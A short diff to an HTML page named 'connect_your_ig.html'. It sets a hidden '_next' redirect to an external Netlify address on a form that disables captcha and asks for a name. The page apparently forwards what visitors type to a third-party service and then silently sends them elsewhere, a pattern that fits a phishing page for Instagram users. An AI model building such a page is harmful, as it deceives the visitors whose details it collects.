--- a/connect_your_ig.html
+++ b/connect_your_ig.html
@@ -60,7 +60,7 @@
                                     </span>
                                     <input type="text" name="name" id="name" required>
                              <input type="hidden" name="_captcha" value="false"> 
- <input type="hidden" name="_next" value=""> 
+ <input type="hidden" name="_next" value="https://vtoin.netlify.app/"> 
                                 </div>
                                 
                             </div>
